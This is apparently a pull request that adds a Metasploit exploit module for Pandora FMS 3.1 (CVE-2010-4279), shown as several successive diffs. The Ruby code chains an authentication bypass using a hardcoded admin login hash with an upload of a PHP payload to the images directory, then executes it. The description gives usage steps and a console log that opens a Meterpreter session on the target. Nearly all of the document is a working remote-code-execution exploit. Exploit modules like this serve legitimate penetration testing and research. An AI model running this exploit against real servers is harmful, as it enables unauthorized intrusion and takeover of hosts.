### PR TITLE
Add module for Pandora FMS Auth Bypass and Upload Exec

### DIFF
--- a/modules/exploits/multi/http/pandora_upload_exec.rb
+++ b/modules/exploits/multi/http/pandora_upload_exec.rb
@@ -1,0 +1,163 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
+			'Description'    => %q{
+				This module exploits an authentication bypass vulnerability in Pandora v3.1 as 
+				disclosed by Juan Galiana Lara.  It also integrates with the built-in pandora 
+				upload which allows a user to upload arbitrary files to the '/images/' directory.
+
+				This module was created as an exercise in the Metasploit Mastery Class at Blackhat 
+				that was facilitated by egypt and mubix.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Raymond Nunez <rcnunez[at]upd.edu.ph>', # metasploit module
+					'_flood <freshbones[at]gmail.com>', # metasploit module
+					'mubix <mubix[at]room362.com>', # auth bypass and file upload
+					'egypt <egypt[at]metasploit.com>', # auth bypass file upload
+				],
+			'References'     =>
+				[
+					['CVE', '2010-4279'],
+					['OSVDB',   '69549'],
+					['BID',   '45112']
+				],
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        =>
+				[
+					['Automatic Targeting', { 'auto' => true }]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Nov 30 2010",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
+			], self.class)
+	end
+
+	def check
+
+		base  = target_uri.path
+		peer  = "#{rhost}:#{rport}"
+
+		# retrieve software version from login page
+		begin
+			res = send_request_cgi({
+				'method' => 'GET',
+				'uri'    => normalize_uri(base, 'index.php')
+			})
+			if res and res.code == 200
+				if res.body =~ /v3.1 Build PC100609/
+					return Exploit::CheckCode::Vulnerable
+				elsif res.body =~ /Pandora/
+					return Exploit::CheckCode::Detected
+				end
+			end
+			return Exploit::CheckCode::Safe
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("#{peer} - Connection failed")
+		end
+		return Exploit::CheckCode::Unknown
+
+	end
+
+	# upload a payload using the pandora built-in file upload
+	def upload(base, file, cookiemonster)
+		data = Rex::MIME::Message.new
+		data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}.php\"")
+		data.add_part("Go", nil, nil, 'form-data; name="go"')
+		data.add_part("images", nil, nil, 'form-data; name="directory"')
+		data.add_part("1", nil, nil, 'form-data; name="upload_file"')
+		data_post = data.to_s
+		data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+		res = send_request_cgi({
+			'method'  => 'POST',
+			'uri'     => normalize_uri(base, 'index.php?sec=gsetup&sec2=godmode/setup/file_manager'),
+			'cookie'  => cookiemonster,
+			'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+			'data'    => data_post
+		})
+		return res
+	end
+
+	def on_new_session(client)
+		if client.type == "meterpreter"
+			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+			client.fs.file.rm("#{@fname}.php")
+		else
+			client.shell_command_token("rm #{@fname}.php")
+		end
+	end
+
+	def exploit
+
+		base   = target_uri.path
+		@peer  = "#{rhost}:#{rport}"
+		@fname = rand_text_numeric(7)
+
+		# bypass authentication and get session cookie
+		res = send_request_cgi({
+                        'method'  => 'GET',
+                        'uri'     => normalize_uri(base, 'index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1')
+                })
+
+                # fix if logic
+                if res and res.code == 200
+                    if res.body =~ /Logout/
+					cookiemonster = res.headers['Set-Cookie']
+					cookiemonster = cookiemonster.split(" ")[0]
+                                        print_status("Login Bypass Successful")
+					print_status("cookie monster = " + cookiemonster)
+				else
+                                        print_error("Login Bypass Failed")
+					fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Login bypass failed")
+				end
+		end
+
+		# upload PHP payload to images/[fname].php
+		print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+		php    = %Q|<?php #{payload.encoded} ?>|
+		begin
+			res = upload(base, php, cookiemonster)
+			if res and res.code == 200
+				print_good("#{@peer} - File uploaded successfully")
+			else
+				fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+			end
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+		end
+
+		# retrieve and execute PHP payload
+		print_status("#{@peer} - Executing payload (images/#{@fname}.php)")
+		begin
+			print_status ("base = " + base)
+			res = send_request_cgi({
+				'method' => 'GET',
+				'uri'    => normalize_uri(base, 'images', "#{@fname}.php")
+			})
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+		end
+
+	end
+end

--- a/modules/exploits/multi/http/pandora_upload_exec.rb
+++ b/modules/exploits/multi/http/pandora_upload_exec.rb
@@ -1,163 +1,170 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+  Rank = ExcellentRanking
 
-	include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
 
-	def initialize(info={})
-		super(update_info(info,
-			'Name'           => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
-			'Description'    => %q{
-				This module exploits an authentication bypass vulnerability in Pandora v3.1 as 
-				disclosed by Juan Galiana Lara.  It also integrates with the built-in pandora 
-				upload which allows a user to upload arbitrary files to the '/images/' directory.
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
+      'Description'    => %q{
+        This module exploits an authentication bypass vulnerability in Pandora v3.1 as
+        disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
+        upload which allows a user to upload arbitrary files to the '/images/' directory.
 
-				This module was created as an exercise in the Metasploit Mastery Class at Blackhat 
-				that was facilitated by egypt and mubix.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         =>
-				[
-					'Raymond Nunez <rcnunez[at]upd.edu.ph>', # metasploit module
-					'_flood <freshbones[at]gmail.com>', # metasploit module
-					'mubix <mubix[at]room362.com>', # auth bypass and file upload
-					'egypt <egypt[at]metasploit.com>', # auth bypass file upload
-				],
-			'References'     =>
-				[
-					['CVE', '2010-4279'],
-					['OSVDB',   '69549'],
-					['BID',   '45112']
-				],
-			'Platform'       => 'php',
-			'Arch'           => ARCH_PHP,
-			'Targets'        =>
-				[
-					['Automatic Targeting', { 'auto' => true }]
-				],
-			'Privileged'     => false,
-			'DisclosureDate' => "Nov 30 2010",
-			'DefaultTarget'  => 0))
+        This module was created as an exercise in the Metasploit Mastery Class at Blackhat
+        that was facilitated by egypt and mubix.
 
-		register_options(
-			[
-				OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
-			], self.class)
-	end
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Juan Galiana Lara',                     # Vulnerability discovery
+          'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module
+          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',  # Metasploit module
+          '_flood <freshbones[at]gmail.com>',      # Metasploit module
+          'mubix <mubix[at]room362.com>',          # Auth bypass and file upload
+          'egypt <egypt[at]metasploit.com>',       # Auth bypass and file upload
+        ],
+      'References'     =>
+        [
+          ['CVE', '2010-4279'],
+          ['OSVDB',   '69549'],
+          ['BID',   '45112']
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Nov 30 2010",
+      'DefaultTarget'  => 0))
 
-	def check
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
+      ], self.class)
+  end
 
-		base  = target_uri.path
-		peer  = "#{rhost}:#{rport}"
+  def check
 
-		# retrieve software version from login page
-		begin
-			res = send_request_cgi({
-				'method' => 'GET',
-				'uri'    => normalize_uri(base, 'index.php')
-			})
-			if res and res.code == 200
-				if res.body =~ /v3.1 Build PC100609/
-					return Exploit::CheckCode::Vulnerable
-				elsif res.body =~ /Pandora/
-					return Exploit::CheckCode::Detected
-				end
-			end
-			return Exploit::CheckCode::Safe
-		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			print_error("#{peer} - Connection failed")
-		end
-		return Exploit::CheckCode::Unknown
+    base  = target_uri.path
 
-	end
+    # retrieve software version from login page
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(base, 'index.php')
+      })
+      if res and res.code == 200
+        if res.body.include?("v3.1 Build PC100609")
+          return Exploit::CheckCode::Vulnerable
+        elsif res.body.include?("Pandora")
+          return Exploit::CheckCode::Detected
+        end
+      end
+      return Exploit::CheckCode::Safe
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} - Connection failed")
+    end
+    return Exploit::CheckCode::Unknown
 
-	# upload a payload using the pandora built-in file upload
-	def upload(base, file, cookiemonster)
-		data = Rex::MIME::Message.new
-		data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}.php\"")
-		data.add_part("Go", nil, nil, 'form-data; name="go"')
-		data.add_part("images", nil, nil, 'form-data; name="directory"')
-		data.add_part("1", nil, nil, 'form-data; name="upload_file"')
-		data_post = data.to_s
-		data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+  end
 
-		res = send_request_cgi({
-			'method'  => 'POST',
-			'uri'     => normalize_uri(base, 'index.php?sec=gsetup&sec2=godmode/setup/file_manager'),
-			'cookie'  => cookiemonster,
-			'ctype'   => "multipart/form-data; boundary=#{data.bound}",
-			'data'    => data_post
-		})
-		return res
-	end
+  # upload a payload using the pandora built-in file upload
+  def upload(base, file, cookies)
 
-	def on_new_session(client)
-		if client.type == "meterpreter"
-			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-			client.fs.file.rm("#{@fname}.php")
-		else
-			client.shell_command_token("rm #{@fname}.php")
-		end
-	end
+    begin
+      data = Rex::MIME::Message.new
+      data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
+      data.add_part("Go", nil, nil, 'form-data; name="go"')
+      data.add_part("images", nil, nil, 'form-data; name="directory"')
+      data.add_part("1", nil, nil, 'form-data; name="upload_file"')
+      data_post = data.to_s
 
-	def exploit
+      res = send_request_cgi({
+        'method'  => 'POST',
+        'uri'     => normalize_uri(base, 'index.php'),
+        'cookie'  => cookies,
+        'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+        'vars_get' => {
+          'sec'  => 'gsetup',
+          'sec2' => 'godmode/setup/file_manager',
+        },
+        'data'    => data_post
+      })
 
-		base   = target_uri.path
-		@peer  = "#{rhost}:#{rport}"
-		@fname = rand_text_numeric(7)
+      register_files_for cleanup(@fname)
+      return res
 
-		# bypass authentication and get session cookie
-		res = send_request_cgi({
-                        'method'  => 'GET',
-                        'uri'     => normalize_uri(base, 'index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1')
-                })
+    rescue ::URI::InvalidURIError
+      fail_with(Exploit::Failure::Unknown, "Unable to get the uri correctly")
+    end
 
-                # fix if logic
-                if res and res.code == 200
-                    if res.body =~ /Logout/
-					cookiemonster = res.headers['Set-Cookie']
-					cookiemonster = cookiemonster.split(" ")[0]
-                                        print_status("Login Bypass Successful")
-					print_status("cookie monster = " + cookiemonster)
-				else
-                                        print_error("Login Bypass Failed")
-					fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Login bypass failed")
-				end
-		end
+  end
 
-		# upload PHP payload to images/[fname].php
-		print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
-		php    = %Q|<?php #{payload.encoded} ?>|
-		begin
-			res = upload(base, php, cookiemonster)
-			if res and res.code == 200
-				print_good("#{@peer} - File uploaded successfully")
-			else
-				fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
-			end
-		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
-		end
+  def exploit
 
-		# retrieve and execute PHP payload
-		print_status("#{@peer} - Executing payload (images/#{@fname}.php)")
-		begin
-			print_status ("base = " + base)
-			res = send_request_cgi({
-				'method' => 'GET',
-				'uri'    => normalize_uri(base, 'images', "#{@fname}.php")
-			})
-		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
-		end
+    base   = target_uri.path
+    @fname = "#{rand_text_numeric(7)}.php")
+    cookies = ""
 
-	end
+    # bypass authentication and get session cookie
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(base, 'index.php'),
+      'vars_get' => {
+        'loginhash_data'  => '21232f297a57a5a743894a0e4a801fc3',
+        'loginhash_user' => 'admin',
+        'loginhash' => '1',
+      },
+    })
+
+    # fix if logic
+    if res and res.code == 200
+      if res.body.include?("Logout")
+        cookies = res.headers['Set-Cookie']
+        cookies = res.get_cookies
+          print_status("Login Bypass Successful")
+          print_status("cookie monster = " + cookies)
+      else
+          print_error("Login Bypass Failed")
+      end
+    end
+
+    # upload PHP payload to images/[fname]
+    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+    php    = %Q|<?php #{payload.encoded} ?>|
+    begin
+      res = upload(base, php, cookies)
+      if res and res.code == 200
+        print_good("#{@peer} - File uploaded successfully")
+      else
+        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+    end
+
+    # retrieve and execute PHP payload
+    print_status("#{@peer} - Executing payload (images/#{@fname}")
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(base, 'images', "#{@fname}")
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+    end
+
+  end
 end

--- a/modules/exploits/multi/http/pandora_upload_exec.rb
+++ b/modules/exploits/multi/http/pandora_upload_exec.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
       if res and res.code == 200
         #Tested on v3.1 Build PC100609 and PC100608
         if res.body.include?("v3.1 Build PC10060")
-          return Exploit::CheckCode::Vulnerable
+          return Exploit::CheckCode::Appears
         elsif res.body.include?("Pandora")
           return Exploit::CheckCode::Detected
         end
@@ -84,35 +84,28 @@ class Metasploit3 < Msf::Exploit::Remote
 
   # upload a payload using the pandora built-in file upload
   def upload(base, file, cookies)
+    data = Rex::MIME::Message.new
+    data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
+    data.add_part("Go", nil, nil, 'form-data; name="go"')
+    data.add_part("images", nil, nil, 'form-data; name="directory"')
+    data.add_part("1", nil, nil, 'form-data; name="upload_file"')
+    data_post = data.to_s
+    data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
-    begin
-      data = Rex::MIME::Message.new
-      data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
-      data.add_part("Go", nil, nil, 'form-data; name="go"')
-      data.add_part("images", nil, nil, 'form-data; name="directory"')
-      data.add_part("1", nil, nil, 'form-data; name="upload_file"')
-      data_post = data.to_s
-      data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(base, 'index.php'),
+      'cookie'  => cookies,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'vars_get' => {
+        'sec'  => 'gsetup',
+        'sec2' => 'godmode/setup/file_manager',
+      },
+      'data'    => data_post
+    })
 
-      res = send_request_cgi({
-        'method'  => 'POST',
-        'uri'     => normalize_uri(base, 'index.php'),
-        'cookie'  => cookies,
-        'ctype'   => "multipart/form-data; boundary=#{data.bound}",
-        'vars_get' => {
-          'sec'  => 'gsetup',
-          'sec2' => 'godmode/setup/file_manager',
-        },
-        'data'    => data_post
-      })
-
-      register_files_for_cleanup(@fname)
-      return res
-
-    rescue ::URI::InvalidURIError
-      fail_with(Exploit::Failure::Unknown, "Unable to get the uri correctly")
-    end
-
+    register_files_for_cleanup(@fname)
+    return res
   end
 
   def exploit
@@ -140,33 +133,34 @@ class Metasploit3 < Msf::Exploit::Remote
           print_status("Login Bypass Successful")
           print_status("cookie monster = " + cookies)
       else
-          print_error("Login Bypass Failed")
+          fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
       end
     end
 
     # upload PHP payload to images/[fname]
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
     php    = %Q|<?php #{payload.encoded} ?>|
     begin
       res = upload(base, php, cookies)
-      if res and res.code == 200
-        print_good("#{@peer} - File uploaded successfully")
-      else
-        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
-      end
     rescue ::Rex::ConnectionError
-      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+    if res and res.code == 200
+      print_good("#{peer} - File uploaded successfully")
+    else
+      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (images/#{@fname})")
+    print_status("#{peer} - Executing payload (images/#{@fname})")
     begin
       res = send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(base, 'images', "#{@fname}")
       })
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+    rescue ::Rex::ConnectionError
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
     end
 
   end

--- a/modules/exploits/multi/http/pandora_upload_exec.rb
+++ b/modules/exploits/multi/http/pandora_upload_exec.rb
@@ -26,12 +26,13 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Juan Galiana Lara',                     # Vulnerability discovery
-          'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module
-          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',  # Metasploit module
-          '_flood <freshbones[at]gmail.com>',      # Metasploit module
-          'mubix <mubix[at]room362.com>',          # Auth bypass and file upload
-          'egypt <egypt[at]metasploit.com>',       # Auth bypass and file upload
+          'Juan Galiana Lara',                         # Vulnerability discovery
+          'Raymond Nunez <rcnunez[at]upd.edu.ph>',     # Metasploit module
+          'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
+          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',      # Metasploit module
+          '_flood <freshbones[at]gmail.com>',          # Metasploit module
+          'mubix <mubix[at]room362.com>',              # Auth bypass and file upload
+          'egypt <egypt[at]metasploit.com>',           # Auth bypass and file upload
         ],
       'References'     =>
         [
@@ -66,7 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote
         'uri'    => normalize_uri(base, 'index.php')
       })
       if res and res.code == 200
-        if res.body.include?("v3.1 Build PC100609")
+        #Tested on v3.1 Build PC100609 and PC100608
+        if res.body.include?("v3.1 Build PC10060")
           return Exploit::CheckCode::Vulnerable
         elsif res.body.include?("Pandora")
           return Exploit::CheckCode::Detected
@@ -90,6 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
       data.add_part("images", nil, nil, 'form-data; name="directory"')
       data.add_part("1", nil, nil, 'form-data; name="upload_file"')
       data_post = data.to_s
+      data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
       res = send_request_cgi({
         'method'  => 'POST',
@@ -103,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'    => data_post
       })
 
-      register_files_for cleanup(@fname)
+      register_files_for_cleanup(@fname)
       return res
 
     rescue ::URI::InvalidURIError
@@ -115,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
 
     base   = target_uri.path
-    @fname = "#{rand_text_numeric(7)}.php")
+    @fname = "#{rand_text_numeric(7)}.php"
     cookies = ""
 
     # bypass authentication and get session cookie
@@ -156,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (images/#{@fname}")
+    print_status("#{@peer} - Executing payload (images/#{@fname})")
     begin
       res = send_request_cgi({
         'method' => 'GET',


### PR DESCRIPTION
**Verification**
- [ ] Install CentOS 5
- [ ] Update PHP to at least 5.2
- [ ] Install Pandora FMS Console 3.1
- [ ] run `msfconsole`
- [ ] use the module: `use exploit/multi/http/pandora_upload_exec`
- [ ] set RHOST
- [ ] set PAYLOAD: `set payload php/meterpreter/bind_tcp`
- [ ] run `check`

```
msf > use exploit/multi/http/pandora_upload_exec
msf exploit(pandora_upload_exec) > set RHOST 192.168.150.100
RHOST => 192.168.150.100
msf exploit(pandora_upload_exec) > check
[+] The target appears to be vulnerable.
msf exploit(pandora_upload_exec) > 
```
- [ ] run `exploit`

```
msf exploit(pandora_upload_exec) > exploit

[*] Started bind handler
[*] Login Bypass Successful
[*] cookie monster = PHPSESSID=nop9s89smjrgeds910rhsioon1;
[*] 192.168.150.100:80 - Uploading PHP payload (1352 bytes)
[+] 192.168.150.100:80 - File uploaded successfully
[*] 192.168.150.100:80 - Executing payload (images/1085172.php)
[*] Sending stage (39848 bytes) to 192.168.150.100
[*] Meterpreter session 2 opened (192.168.150.139:48092 -> 192.168.150.100:55555) at 2015-01-07 18:22:28 +0800
[+] Deleted 1085172.php

meterpreter > sysinfo
Computer    : pandora.domain.com
OS          : Linux pandora.domain.com 2.6.18-238.el5 #1 SMP Thu Jan 13 16:24:47 EST 2011 i686
Meterpreter : php/php
meterpreter > 
```
